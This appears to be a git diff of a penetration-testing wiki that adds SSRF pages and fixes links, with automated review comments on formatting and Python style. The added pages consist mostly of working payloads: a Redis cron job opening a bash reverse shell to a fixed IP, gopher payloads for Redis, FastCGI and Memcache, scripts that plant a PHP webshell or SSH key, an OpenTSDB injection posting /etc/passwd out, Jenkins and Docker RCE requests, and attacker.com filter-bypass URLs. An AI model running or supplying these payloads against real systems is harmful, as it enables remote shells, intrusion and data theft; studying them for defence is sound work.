+**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
+
+**SSRF Canary: iconUriServlet (CVE-2017-9506)**:
+
+* Bamboo < 6.0.0
+* Bitbucket < 4.14.4
+* Crowd < 2.11.2
+* Crucible < 4.3.2
+* Fisheye < 4.3.2
+
+[Atlassian Security Ticket OAUTH-344](https://ecosystem.atlassian.net/browse/OAUTH-344)
+
+```bash
+/plugins/servlet/oauth/users/icon-uri?consumerUri=http://SSRF_CANARY
+```
+
+## OpenTSDB
+
+**Commonly bound port: 4242**
+
+[OpenTSDB Remote Code Execution](https://packetstormsecurity.com/files/136753/OpenTSDB-Remote-Code-Execution.html)
+
+**SSRF Canary: curl via RCE**
+
+```bash
+/q?start=2016/04/13-10:21:00&ignore=2&m=sum:jmxdata.cpu&o=&yrange=[0:]&key=out%20right%20top&wxh=1900x770%60curl%20SSRF_CANARY%60&style=linespoint&png
+```
+
+[OpenTSDB 2.4.0 Remote Code Execution](https://github.com/OpenTSDB/opentsdb/issues/2051)
+
+**SSRF Canary: curl via RCE - CVE-2020-35476**
+
+```bash
+/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system('wget%20--post-file%20/etc/passwd%20SSRF_CANARY')]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json
+```
+
+## Jenkins
+
+**Commonly bound ports: 80,443 (SSL),8080,8888**
+
+Great writeup [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
+
+**SSRF Canary: CVE-2018-1000600**
+
+```bash
+/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword?apiUrl=http://SSRF_CANARY/%23&login=orange&password=tsai
+```
+
+**RCE**
+
+Follow the instructions here to achieve RCE via GET: [Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html)
+
+```bash
+/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name='orange.tw', root='http://SSRF_CANARY/')%0a@Grab(group='tw.orange', module='poc', version='1')%0aimport Orange;
+```
+
+**RCE via Groovy**
+
+```
+cmd = 'curl burp_collab'
+pay = 'public class x {public x(){"%s".execute()}}' % cmd
+data = 'http://jenkins.internal/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=' + urllib.quote(pay)
+```
+
+## Hystrix Dashboard
+
+**Commonly bound ports: 80,443 (SSL),8080**
+
+Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6.
+
+**SSRF Canary: CVE-2020-5412**
+
+```bash
+/proxy.stream?origin=http://SSRF_CANARY/
+```
+
+## W3 Total Cache
+
+**Commonly bound ports: 80,443 (SSL)**
+
+W3 Total Cache 0.9.2.6-0.9.3
+
+**SSRF Canary: CVE-2019-6715**
+
+This needs to be a PUT request:
+
+```bash
+PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1
+Host: {{Hostname}}
+Accept: */*
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36
+Content-Length: 124
+Content-Type: application/x-www-form-urlencoded
+Connection: close
+
+{"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://SSRF_CANARY"}
+```
+
+**SSRF Canary**
+
+The advisory for this vulnerability was released here: [W3 Total Cache SSRF vulnerability](https://klikki.fi/adv/w3\_total\_cache.html)
+
+This PHP code will generate a payload for your SSRF Canary host (replace `url` with your canary host):
+
+```php
+
+```
+
+## Docker
+
+**Commonly bound ports: 2375, 2376 (SSL)**
+
+If you have a partially blind SSRF, you can use the following paths to verify the presence of Docker's API:
+
+```bash
+/containers/json
+/secrets
+/services
+```
+
+**RCE via running an arbitrary docker image**
+
+```http
+POST /containers/create?name=test HTTP/1.1
+Host: website.com
+Content-Type: application/json
+...
+
+{"Image":"alpine", "Cmd":["/usr/bin/tail", "-f", "1234", "/dev/null"], "Binds": [ "/:/mnt" ], "Privileged": true}
+```
+
+Replace alpine with an arbitrary image you would like the docker container to run.
+
+## Gitlab Prometheus Redis Exporter
+
+**Commonly bound ports: 9121**
+
+This vulnerability affects Gitlab instances before version 13.1.1. According to the [Gitlab documentation](https://docs.gitlab.com/ee/administration/monitoring/prometheus/#configuring-prometheus) `Prometheus and its exporters are on by default, starting with GitLab 9.0.`
+
+These exporters provide an excellent method for an attacker to pivot and attack other services using CVE-2020-13379. One of the exporters which is easily exploited is the Redis Exporter.
+
+The following endpoint will allow an attacker to dump all the keys in the redis server provided via the target parameter:
+
+```bash
+http://localhost:9121/scrape?target=redis://127.0.0.1:7001&check-keys=*
+```
+
+***
+
+**Possible via Gopher**
+
+## Redis
+
+**Commonly bound port: 6379**
+
+Recommended reading:
+
+* [Trying to hack Redis via HTTP requests](https://www.agarri.fr/blog/archives/2014/09/11/trying\_to\_hack\_redis\_via\_http\_requests/index.html)
+* [SSRF Exploits against Redis](https://maxchadwick.xyz/blog/ssrf-exploits-against-redis)
+
+**RCE via Cron** - [Gopher Attack Surfaces](https://blog.chaitin.cn/gopher-attack-surfaces/)
+
+```bash
+redis-cli -h $1 flushall
+echo -e "\n\n*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1\n\n"|redis-cli -h $1 -x set 1
+redis-cli -h $1 config set dir /var/spool/cron/
+redis-cli -h $1 config set dbfilename root
+redis-cli -h $1 save
+```
+
+Gopher:
+
+```bash
+gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/172.19.23.228/2333 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
+```
+
+**RCE via Shell Upload (PHP)** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
+
+```python
+#!/usr/bin/env python
+# -*-coding:utf-8-*-
+
+import urllib
+protocol="gopher://"
+ip="192.168.189.208"
+port="6379"
+shell="\n\n\n\n"
+filename="shell.php"
+path="/var"
+passwd=""
+
+cmd=["flushall",
+ "set 1 {}".format(shell.replace(" ","${IFS}")),
+ "config set dir {}".format(path),
+ "config set dbfilename {}".format(filename),
+ "save"
+ ]
+if passwd:
+ cmd.insert(0,"AUTH {}".format(passwd))
+payload=protocol+ip+":"+port+"/_"
+def redis_format(arr):
+ CRLF="\r\n"
+ redis_arr = arr.split(" ")
+ cmd=""
+ cmd+="*"+str(len(redis_arr))
+ for x in redis_arr:
+ cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
+ cmd+=CRLF
+ return cmd
+
+if __name__=="__main__":
+ for x in cmd:
+ payload += urllib.quote(redis_format(x))
+ print payload
+```
+
+**RCE via authorized\_keys** - [Redis Getshell Summary](https://www.mdeditor.tw/pl/pBy0)
+
+```python
+import urllib
+protocol="gopher://"
+ip="192.168.189.208"
+port="6379"
+# shell="\n\n\n\n"
+sshpublic_key = "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8IOnJUAt5b/5jDwBDYJTDULjzaqBe2KW3KhqlaY58XveKQRBLrG3ZV0ffPnIW5SLdueunb4HoFKDQ/KPXFzyvVjqByj5688THkq1RJkYxGlgFNgMoPN151zpZ+eCBdFZEf/m8yIb3/7Cp+31s6Q/DvIFif6IjmVRfWXhnkjNehYjsp4gIEBiiW/jWId5yrO9+AwAX4xSabbxuUyu02AQz8wp+h8DZS9itA9m7FyJw8gCrKLEnM7PK/ClEBevDPSR+0YvvYtnUxeCosqp9VrjTfo5q0nNg9JAvPMs+EA1ohUct9UyXbTehr1Bdv4IXx9+7Vhf4/qwle8HKali3feIZ root@kali\n\n"
+filename="authorized_keys"
+path="/root/.ssh/"
+passwd=""
+cmd=["flushall",
+ "set 1 {}".format(sshpublic_key.replace(" ","${IFS}")),
+ "config set dir {}".format(path),
+ "config set dbfilename {}".format(filename),
+ "save"
+ ]
+if passwd:
+ cmd.insert(0,"AUTH {}".format(passwd))
+payload=protocol+ip+":"+port+"/_"
+def redis_format(arr):
+ CRLF="\r\n"
+ redis_arr = arr.split(" ")
+ cmd=""
+ cmd+="*"+str(len(redis_arr))
+ for x in redis_arr:
+ cmd+=CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
+ cmd+=CRLF
+ return cmd
+
+if __name__=="__main__":
+ for x in cmd:
+ payload += urllib.quote(redis_format(x))
+ print payload
+```
+
+**RCE on GitLab via Git protocol**
+
+Great writeup from Liveoverflow [here](https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/).
+
+While this required authenticated access to GitLab to exploit, I am including the payload here as the `git` protocol may work on the target you are hacking. This payload is for reference.
+
+```bash
+git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20127%2E0%2E0%2E1%202222%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf123321.git
+```
+
+## Memcache
+
+**Commonly bound port: 11211**
+
+* [vBulletin Memcache RCE](https://www.exploit-db.com/exploits/37815)
+* [GitHub Enterprise Memcache RCE](https://www.exploit-db.com/exploits/42392)
+* [Example Gopher payload for Memcache](https://blog.safebuff.com/2016/07/03/SSRF-Tips/#SSRF-memcache-Getshell)
+
+```bash
+gopher://[target ip]:11211/_%0d%0aset ssrftest 1 0 147%0d%0aa:2:{s:6:"output";a:1:{s:4:"preg";a:2:{s:6:"search";s:5:"/.*/e";s:7:"replace";s:33:"eval(base64_decode($_POST[ccc]));";}}s:13:"rewritestatus";i:1;}%0d%0a
+gopher://192.168.10.12:11211/_%0d%0adelete ssrftest%0d%0a
+```
+
+## Apache Tomcat
+
+**Commonly bound ports: 80,443 (SSL),8080,8443 (SSL)**
+
+Effective against Tomcat 6 only:
+
+[gopher-tomcat-deployer](https://github.com/pimps/gopher-tomcat-deployer)
+
+CTF writeup using this technique:
+
+[From XXE to RCE: Pwn2Win CTF 2018 Writeup](https://bookgin.tw/2018/12/04/from-xxe-to-rce-pwn2win-ctf-2018-writeup/)
+
+## FastCGI
+
+**Commonly bound ports: 80,443 (SSL)**
+
+This was taken from [here](https://blog.chaitin.cn/gopher-attack-surfaces/).
+
+```bash
+gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH97%0E%04REQUEST_METHODPOST%09%5BPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%13SCRIPT_FILENAME/var/www/html/1.php%0D%01DOCUMENT_ROOT/%01%04%00%01%00%00%00%00%01%05%00%01%00a%07%00%3C%3Fphp%20system%28%27bash%20-i%20%3E%26%20/dev/tcp/172.19.23.228/2333%200%3E%261%27%29%3Bdie%28%27-----0vcdb34oju09b8fd-----%0A%27%29%3B%3F%3E%00%00%00%00%00%00%00
+```
+
+## Java RMI
+
+**Commonly bound ports: 1090,1098,1099,1199,4443-4446,8999-9010,9999**
+
+Blind _SSRF_ vulnerabilities that allow arbitrary bytes (_gopher based_) can be used to perform deserialization or codebase attacks on the _Java RMI_ default components (_RMI Registry_, _Distributed Garbage Collector_, _Activation System_). A detailed writeup can be found [here](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/). The following listing shows an example for the payload generation:
+
+```
+$ rmg serial 127.0.0.1 1090 CommonsCollections6 'curl example.burpcollaborator.net' --component reg --ssrf --gopher
+[+] Creating ysoserial payload... done.
+[+]
+[+] Attempting deserialization attack on RMI Registry endpoint...
+[+]
+[+] SSRF Payload: gopher://127.0.0.1:1090/_%4a%52%4d%49%00%02%4c%50%ac%ed%00%05%77%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%02%44%15%4d[...]
+```
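Review bot: the two gopher payload generators (the `RCE via Shell Upload (PHP)` and `RCE via authorized_keys` listings) are Python 2 only: `urllib.quote` does not exist in Python 3 (the call is `urllib.parse.quote(...)`) and the bare `print payload` statement is a syntax error there, yet the shebang is the unversioned `#!/usr/bin/env python`; either pin it to `python2` or port both scripts. The two listings are otherwise identical apart from the `shell`/`sshpublic_key`, `filename` and `path` values, so one listing with those three variables called out would be easier to keep correct, and the `shell="\n\n\n\n"` value is an empty placeholder with no comment saying so. Separately, the bold line `**Possible via Gopher**` that follows the `***` rule has no sentence around it, so it is unclear which service it qualifies, and the Java RMI listing's fence has no language tag while every other block on the page uses `bash` or `python`.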
diff --git a/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
new file mode 100644
index 000000000..15cff3fee
--- /dev/null
+++ b/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -0,0 +1,187 @@
+# URL Format Bypass
+
+### Localhost
+
+```bash
+## Localhost
+http://127.0.0.1:80
+http://127.0.0.1:443
+http://127.0.0.1:22
+http://127.1:80
+http://0
+http://0.0.0.0:80
+http://localhost:80
+http://[::]:80/
+http://[::]:25/ SMTP
+http://[::]:3128/ Squid
+http://[0000::1]:80/
+http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
+http://①②⑦.⓪.⓪.⓪
+
+## CDIR bypass
+http://127.127.127.127
+http://127.0.1.3
+http://127.0.0.0
+
+# Dot bypass
+127。0。0。1
+127%E3%80%820%E3%80%820%E3%80%821
+
+## Decimal bypass
+http://2130706433/ = http://127.0.0.1
+http://3232235521/ = http://192.168.0.1
+http://3232235777/ = http://192.168.1.1
+
+## Octal Bypass
+http://0177.0000.0000.0001
+http://00000177.00000000.00000000.00000001
+http://017700000001
+
+## Hexadecimal bypass
+127.0.0.1 = 0x7f 00 00 01
+http://0x7f000001/ = http://127.0.0.1
+http://0xc0a80014/ = http://192.168.0.20
+0x7f.0x00.0x00.0x01
+0x0000007f.0x00000000.0x00000000.0x00000001
+
+## You can also mix different encoding formats
+## https://www.silisoftware.com/tools/ipconverter.php
+
+## Malformed and rare
+localhost:+11211aaa
+localhost:00011211aaaa
+http://0/
+http://127.1
+http://127.0.1
+
+## DNS to localhost
+localtest.me = 127.0.0.1
+customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
+mail.ebc.apple.com = 127.0.0.6 (localhost)
+127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
+www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
+http://customer1.app.localhost.my.company.127.0.0.1.nip.io
+http://bugbounty.dod.network = 127.0.0.2 (localhost)
+1ynrnhl.xip.io == 169.254.169.254
+spoofed.burpcollaborator.net = 127.0.0.1
+```
+
+![](<../../.gitbook/assets/image (649).png>)
+
+### Domain Parser
+
+```bash
+https:attacker.com
+https:/attacker.com
+http:/\/\attacker.com
+https:/\attacker.com
+//attacker.com
+\/\/attacker.com/
+/\/attacker.com/
+/attacker.com
+%0D%0A/attacker.com
+#attacker.com
+#%20@attacker.com
+@attacker.com
+attacker%00.com
+attacker%E3%80%82com
+attacker。com
+ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ
+```
+
+```
+① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾
+⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗
+⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰
+⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ
+Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
+ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
+```
+
+### Domain Confusion
+
+```bash
+# Try also to change attacker.com for 127.0.0.1 to try to access localhost
+http://{domain}@attacker.com
+http://{domain}%6D@attacker.com
+https://www.victim.com(\u2044)some(\u2044)path(\u2044)(\u0294)some=param(\uff03)hash@attacker.com
+http://attacker.com#{domain}
+http://{domain}.attacker.com
+http://attacker.com/{domain}
+http://attacker.com/?d={domain}
+https://{domain}@attacker.com
+https://attacker.com#{domain}
+https://{domain}.attacker.com
+https://attacker.com/{domain}
+https://attacker.com/?d={domain}
+http://{domain}@attacker.com
+http://attacker.com#{domain}
+http://{domain}.attacker.com
+http://attacker.com/{domain}
+http://attacker.com/?d={domain}
+http://attacker.com%00{domain}
+http://attacker.com?{domain}
+http://attacker.com///{domain}
+https://attacker.com%00{domain}
+https://attacker.com%0A{domain}
+https://attacker.com?{domain}
+https://attacker.com///{domain}
+https://attacker.com\{domain}/
+https://attacker.com;https://{domain}
+https://attacker.com\{domain}/
+https://attacker.com\.{domain}
+https://attacker.com/.{domain}
+https://attacker.com\@@{domain}
+https://attacker.com:\@@{domain}
+https://attacker.com#\@{domain}
+https://attacker.com\anything@{domain}/
+
+# On each IP position try to put 1 attackers domain and the others the victim domain
+http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
+
+#Parameter pollution
+next={domain}&next=attacker.com
+```
+
+### Bypass via redirect
+
+It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\
+For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\
+[Check out this report.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
+
+```python
+#!/usr/bin/env python3
+
+#python3 ./redirector.py 8000 http://127.0.0.1/
+
+import sys
+from http.server import HTTPServer, BaseHTTPRequestHandler
+
+if len(sys.argv)-1 != 2:
+ print("Usage: {} ".format(sys.argv[0]))
+ sys.exit()
+
+class Redirect(BaseHTTPRequestHandler):
+ def do_GET(self):
+ self.send_response(302)
+ self.send_header('Location', sys.argv[2])
+ self.end_headers()
+
+HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
+```
+
+## Explained Tricks
+
+### Blackslash-trick
+
+In short, the _backslash-trick_ relies on exploiting a minor difference between two “URL” specifications: the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing), and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). RFC3986 is a generic, multi-purpose specification for the syntax of _Uniform Resource Identifiers_, while the WHATWG URL Standard is specifically aimed at the Web, and at URLs (which are a subset of URIs). Modern browsers implement the WHATWG URL Standard.
+
+Both of them describe a way of parsing URI/URLs, with one slight difference. The WHATWG specification describes [one extra character](https://url.spec.whatwg.org/#authority-state), the `\`, which behaves just like `/`: ends the hostname & authority and starts the path of the URL.
+
+![The two specifications parsing the same URL differently](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec\_difference.jpg)
+
+### Other Confusions
+
+![](<../../.gitbook/assets/image (629).png>)
+
+image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
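Review bot: in the `redirector.py` listing the usage message `print("Usage: {} ".format(sys.argv[0]))` names neither of the two required arguments, so whoever trips the `len(sys.argv)-1 != 2` check is told nothing about what is missing; print `Usage: {} <port> <redirect-url>` and leave with `sys.exit(1)` rather than `sys.exit()`, which reports success. Two labels carry typos: the heading `### Blackslash-trick` should be `### Backslash-trick` (the prose below it correctly says _backslash-trick_), and the comment `## CDIR bypass` should be `## CIDR bypass`, since the entries under it are other addresses inside the 127.0.0.0/8 loopback block; the heading levels also jump from `# URL Format Bypass` straight to `###` while `## Explained Tricks` appears later, so the sections do not nest. The `Domain Confusion` block repeats six entries verbatim (for example `http://{domain}@attacker.com`, `http://attacker.com#{domain}` and `https://attacker.com\{domain}/`), the untagged block of enclosed alphanumerics starting `① ② ③` has no sentence saying it is the character set behind the `ⒶⓉⓉⒶⒸⓀⒺⓡ.Ⓒⓞⓜ` entry, and "if you uses a" in the redirect paragraph should read "if you use a".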
diff --git a/pentesting-web/web-vulnerabilities-methodology.md b/pentesting-web/web-vulnerabilities-methodology.md
index 25b22f39f..0ea550238 100644
--- a/pentesting-web/web-vulnerabilities-methodology.md
+++ b/pentesting-web/web-vulnerabilities-methodology.md
@@ -35,7 +35,7 @@ If the introduced data may somehow being reflected in the response, the page mig
* [ ] [**Open Redirect**](open-redirect.md)****
* [ ] ****[**Prototype Pollution to XSS**](deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)****
* [ ] [**Server Side Inclusion/Edge Side Inclusion**](server-side-inclusion-edge-side-inclusion-injection.md)****
-* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery.md)****
+* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)****
* [ ] [**Server Side Template Injection**](ssti-server-side-template-injection/)****
* [ ] [**Reverse Tab Nabbing**](reverse-tab-nabbing.md)****
* [ ] [**XSLT Server Side Injection**](xslt-server-side-injection-extensible-stylesheet-languaje-transformations.md)****
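Review bot: the changed line `* [ ] [**Server Side Request Forgery**](ssrf-server-side-request-forgery/)****` keeps the trailing `****` that every item in this list carries; those are empty bold markers that some markdown engines render as literal asterisks, so while this line is being touched the marker should be dropped, and the surrounding context lines could get the same cleanup in this commit.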
diff --git a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
index 55008183c..f6d3d3a4e 100644
--- a/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
+++ b/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md
@@ -128,7 +128,7 @@ for(let i=0; i<1000; i++) {
```
-### [SSRF](../ssrf-server-side-request-forgery.md)
+### [SSRF](../ssrf-server-side-request-forgery/)
This vulnerability can be transformed very easily in a SSRF (as you can make the script load external resources). So just try to exploit it (read some metadata?).
diff --git a/pentesting/pentesting-web/buckets/aws-s3.md b/pentesting/pentesting-web/buckets/aws-s3.md
index 5df8d3284..76d088052 100644
--- a/pentesting/pentesting-web/buckets/aws-s3.md
+++ b/pentesting/pentesting-web/buckets/aws-s3.md
@@ -24,7 +24,7 @@ Prerequisites, at least you need awscli
sudo apt install awscli
```
-You can get your credentials here [https://console.aws.amazon.com/iam/home?#/security_credential](https://console.aws.amazon.com/iam/home?#/security_credential) but you need an aws account, free tier account : [https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/](https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free_np/)
+You can get your credentials here [https://console.aws.amazon.com/iam/home?#/security\_credential](https://console.aws.amazon.com/iam/home?#/security\_credential) but you need an aws account, free tier account : [https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free\_np/](https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free\_np/)
```
aws configure --profile
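Review bot: the `\_` escapes added inside the link destinations, `(https://console.aws.amazon.com/iam/home?#/security\_credential)` and `(https://aws.amazon.com/s/dm/optimization/server-side-test/free-tier/free\_np/)`, are unnecessary, because an underscore inside a link destination cannot open emphasis, and they are fragile: CommonMark does process backslash escapes in destinations, but a renderer that does not will copy the backslash into the href and break the URL. Keep the underscores literal in the destination; escaping them in the visible link text is harmless either way.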
@@ -105,7 +105,7 @@ If you find some private AWS keys, you can create a profile using those:
aws configure --profile flawscloud
```
-Notice that if you find a users credentials in the meta-data folder, you will need to add the _aws_session_token_ to the profile.
+Notice that if you find a users credentials in the meta-data folder, you will need to add the _aws\_session\_token_ to the profile.
### Get buckets
@@ -245,7 +245,7 @@ The above command will list the disk you attached to your instance.
## SSRF attacks through AWS
-If you want to read about how can you exploit meta-data in AWS [you should read this page](../../../pentesting-web/ssrf-server-side-request-forgery.md#abusing-ssrf-in-aws-environment)
+If you want to read about how can you exploit meta-data in AWS [you should read this page](../../../pentesting-web/ssrf-server-side-request-forgery/#abusing-ssrf-in-aws-environment)
## Tools to scan the configuration of buckets **or to discover buckets**
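Review bot: the fragment `#abusing-ssrf-in-aws-environment` is carried over unchanged while the target moves from the single file `ssrf-server-side-request-forgery.md` to the `ssrf-server-side-request-forgery/` directory, and this same patch starts splitting the SSRF material into sub-pages (`url-format-bypass.md` is added above); confirm that the heading which produces that anchor still lives in the directory's README rather than in a new sub-page, otherwise the fragment resolves silently to the top of the page and the reader lands on the wrong section.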